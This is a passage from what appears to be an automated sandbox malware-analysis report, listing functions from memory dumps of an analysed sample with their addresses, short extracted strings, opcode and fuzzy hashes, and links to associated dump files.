Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
Instruction ID: b7645b40df598d592da656d6844518463fdef838635afc0ab2baa31dacc5cea9
Opcode Fuzzy Hash: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
Instruction Fuzzy Hash: 2871E6327097558BE7249D6D8C8021EB6C36BC6330F69C768E8BD9B3E5E675CD018782

Function 00CB4271 Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

w, xrefs: 00CB4368

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 929f73faf9f030f9d113ce8b3f6c82913983efa4c933609435a37c00e626cbed
Instruction ID: cf5e54a51ebe2a23730958a0c12fbc6c219c11a397b327a4cc44b2c2e1aefcdf
Opcode Fuzzy Hash: 929f73faf9f030f9d113ce8b3f6c82913983efa4c933609435a37c00e626cbed
Instruction Fuzzy Hash: A78179B3F111258BF3944D38CC583A26253A7A4320F2F82388E9D6BBC5ED7E5D0A5384

Function 00CF62E2 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

t*}, xrefs: 00CF6393

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: t*}
API String ID: 0-2512514278
Opcode ID: 499924786cc482de4c675cf53698c595b6e95bdf92de43271a8bf9e81af18b41
Instruction ID: e5910a14fac1513769148582e0040aec52b34be21bc88a8e653867d5497f8eb4
Opcode Fuzzy Hash: 499924786cc482de4c675cf53698c595b6e95bdf92de43271a8bf9e81af18b41
Instruction Fuzzy Hash: 4C6104B3E086245FE300AA2DDC4536AB7D5DB94320F2B4A3DDED8D7380E9399C018696

Function 00CCA491 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

<, xrefs: 00CCA4F1

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: b5387f8e8cf77944b9d9154e38df334473d6355a4c14fe1242a323d999c77ffb
Instruction ID: c7127fd1b37556692dfa6f54d42e65fd74e853d188e5e15d814c289c40e57668
Opcode Fuzzy Hash: b5387f8e8cf77944b9d9154e38df334473d6355a4c14fe1242a323d999c77ffb
Instruction Fuzzy Hash: 53717B73E112258BF3944E38CC983A17392EB95315F2E817C8E895B7C6DD3E6D499384

Function 00C5E06A Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

cba`, xrefs: 00C5E085

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: cba`
API String ID: 2994545307-1926275841
Opcode ID: 3a64d919be70691a297760c43f24c84234ed971f1d296c60c37ef864bb9f11cb
Instruction ID: 34a6601c1a7014d6d65416c10f39eca9510789045fd8ac5b5d8b3af04a4a8573
Opcode Fuzzy Hash: 3a64d919be70691a297760c43f24c84234ed971f1d296c60c37ef864bb9f11cb
Instruction Fuzzy Hash: 3A5128382082809BD7588B28DC95B7F7796EB91315F24983CE89E97263C6309E89C745

Function 00DCE01C Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

6, xrefs: 00DCE143

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: ae617bc8c6203cb447409555867b477349be35822fa9d0b99856fe075046df6c
Instruction ID: 0a02d7d2953408e4a7fc468d820acedb95960604942defdb6ced24f40825f8b2
Opcode Fuzzy Hash: ae617bc8c6203cb447409555867b477349be35822fa9d0b99856fe075046df6c
Instruction Fuzzy Hash: 8D718DF3F116254BF3944938CC593616683EBD5324F2F82788E98AB7C6D87E9D0A5384

Function 00D3C6D8 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

gSa, xrefs: 00D3C81F

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: gSa
API String ID: 0-4030743074
Opcode ID: 262dd326ae5d279b15045a24a8ee24d7a55f5c9bd11461c24f12639a08c24bb7
Instruction ID: 81d815049646a0f7fe3226824b43f17caa6c2be832b288ff505f103630f3c65f
Opcode Fuzzy Hash: 262dd326ae5d279b15045a24a8ee24d7a55f5c9bd11461c24f12639a08c24bb7
Instruction Fuzzy Hash: 06619CB7F112254BF3844D69CC983627683EB95310F2F82788E89AB7C5DD7E5D095384

Function 00D590DC Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

L, xrefs: 00D59213

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 84d1051556077dfa7ad75973a1fa76285c75451150bda31c70bc32a7a0fb33a8
Instruction ID: 1ee2d60a2f8af14dfe6d8b862e223247140e8e7a438141d76d27e52ba07a98ec
Opcode Fuzzy Hash: 84d1051556077dfa7ad75973a1fa76285c75451150bda31c70bc32a7a0fb33a8
Instruction Fuzzy Hash: AE6138B3E111258BF3944E24CC943A17292EB95325F2F817C8E8C6B7C6D97F6D49A384

Function 00D8C485 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

k$h, xrefs: 00D8C4E2

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: k$h
API String ID: 0-1130575223
Opcode ID: 66a3b83247bfc679c4244885da86a3c06a2987d040eaa8d1e5821fac11dea8ba
Instruction ID: 582c083db2850ca66de61b89c2d03b4f2a0ef50b45745f96e788e91c0a9fdb1b
Opcode Fuzzy Hash: 66a3b83247bfc679c4244885da86a3c06a2987d040eaa8d1e5821fac11dea8ba
Instruction Fuzzy Hash: 2B617FB3F2012447F3944E28CC543A17293EB95324F2F86788E99AB7C5ED3E5D0A5384

Function 00C7B4BB Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

CUUI, xrefs: 00C7B588

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: CUUI
API String ID: 0-173970609
Opcode ID: 8b9f11835a46705a8c945a96c1f1f17f17a444f0aea2d18794150020f467c7bb
Instruction ID: 488c153c6484f4143a18f169ce62120b8acfc4e6ccfa9cca7c993f56887dc4f8
Opcode Fuzzy Hash: 8b9f11835a46705a8c945a96c1f1f17f17a444f0aea2d18794150020f467c7bb
Instruction Fuzzy Hash: D24104A110C3D08ADB358F2584903ABBBE2AFD3304F58C8ADD6D96B243C3758906CB56

Function 00C75230 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

cba`, xrefs: 00C752B6

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: cba`
API String ID: 2994545307-1926275841
Opcode ID: b473e5566c28fee1f5e2693817bd9115347aa8747b9dac277615f816a85521ee
Instruction ID: 173a276c48361c4c6e212edd8dc04f198a64bcf97bc8428e4f8df6c14e00bbb8
Opcode Fuzzy Hash: b473e5566c28fee1f5e2693817bd9115347aa8747b9dac277615f816a85521ee
Instruction Fuzzy Hash: 5F115736A44B104BC324CE28CDC162A77E5EB84314F55562DE8BDD73B2E2A0DC0087D5

Function 00E1F0D3 Relevance: .8, Instructions: 753COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf3f6d317e398b5599c04b9de9610cebd29ba552eca5c44b36a942b4b41d0be
Instruction ID: 04638a202da85fa47024ece9da32d2ce039461becdce28aa298a923b210c1090
Opcode Fuzzy Hash: aaf3f6d317e398b5599c04b9de9610cebd29ba552eca5c44b36a942b4b41d0be
Instruction Fuzzy Hash: E932F7F390C6109FE304AE2DEC85BAAB7E5EB94320F1A493DEAC4D3744E535581186D7

Function 00C57470 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
Instruction ID: 3d4a7b0ed130bbf924a8eab47cf24d5e6c8e4031a467ed66003582ee27457622
Opcode Fuzzy Hash: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
Instruction Fuzzy Hash: 77221635A0C3118BC725DF18E8806ABB3E1FFC4316F198A2DDDD697281D734A999CB46

Function 00DDE5C7 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb945b93450cf0f353d26976a1b03c71b8367aa4f3a87e6143a7628d26a689c3
Instruction ID: d7c46c77595841a456765fa40e935356be6c59c16c413ea03189d0d820a2a2aa
Opcode Fuzzy Hash: cb945b93450cf0f353d26976a1b03c71b8367aa4f3a87e6143a7628d26a689c3
Instruction Fuzzy Hash: A802E0F3E116100BF3485939DD9836A7682DBD0324F2B823D9A89977C5ED7D98098384

Function 00D7A089 Relevance: .5, Instructions: 508COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1620151fe66362d75a85a165b7ea890626208197251d03483be5ccd699d220a
Instruction ID: 7d9ab88df6c06cc556eaaa73721ed9961d7145712f5343381053ce7897ac2116
Opcode Fuzzy Hash: f1620151fe66362d75a85a165b7ea890626208197251d03483be5ccd699d220a
Instruction Fuzzy Hash: 7FF123F3F142144BF3089D39DC593AAB693EBD4314F2B823CCA89977C5E93E48058285

Function 00DC81B0 Relevance: .5, Instructions: 503COMMON

Download Yara Rule

Memory Dump Source

